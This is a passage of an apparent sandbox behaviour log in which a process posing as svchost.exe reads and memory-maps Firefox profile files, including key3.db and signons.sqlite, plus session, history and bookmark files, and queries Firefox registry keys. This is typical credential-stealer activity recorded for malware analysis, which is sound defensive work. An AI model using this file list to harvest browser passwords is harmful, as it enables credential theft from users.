| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = 67 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files (x86)\Mozilla Firefox, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Ini | Enumerate Sections | file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, data_out = General, size = 65000 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = IsRelative, default_value = 1 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
